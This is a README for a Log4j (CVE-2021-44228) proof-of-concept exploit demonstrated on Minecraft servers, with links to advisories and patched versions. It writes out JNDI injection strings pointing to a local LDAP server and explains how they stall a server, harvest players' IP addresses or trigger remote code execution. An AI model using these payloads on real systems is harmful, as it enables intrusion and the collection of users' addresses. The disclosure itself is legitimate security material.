Proof of Concept for Log4j (CVE-2021-44228)

Disclaimer

This project is only for educational purposes.

---

Introduction

This is a proof of concept of the log4j rce adapted from HyCraftHD.

Here are some links for the CVE-2021-44228:

• https://www.lunasec.io/docs/blog/log4j-zero-day
• https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
• apache/logging-log4j2#608
• https://www.youtube.com/watch?v=JPGola6BamU

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is 2.15.0 which fixes the exploit.

Demonstration with minecraft (which uses log4j2)

• Details for the impact on minecraft are listed here: https://twitter.com/slicedlime/status/1469150993527017483
• Article from minecraft is here: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
• Fixed minecraft forge versions: https://twitter.com/gigaherz/status/1469331288368861195
• Detailed article from minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
• Fixed minecraft fabric versions: https://twitter.com/slicedlime/status/1469192689904193537
• Fixed minecraft paper versions: https://twitter.com/aurora_smiles_/status/1469205803232026625
• Fixed minecraft spigot versions: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
• Fixed minecraft sponge versions: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag or sending serialized data

• Paste ${jndi:ldap://127.0.0.1/e} in the chat. If there is an open socket on port 389 logj4 tries to connect and blocks further communiction until a timeout occurs.
• When using this proof of concept exploit, the log in the console will log THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! which is a serialized string object from the ldap server.

• Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.

RCE

• Paste ${jndi:ldap://127.0.0.1/exe} in the chat. If -Dcom.sun.jndi.ldap.object.trustURLCodebase=true is set to true the remote code execution will happen.

• Fortunately modern jdks disable remote class loading by default. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
• Old versions may still allow this!!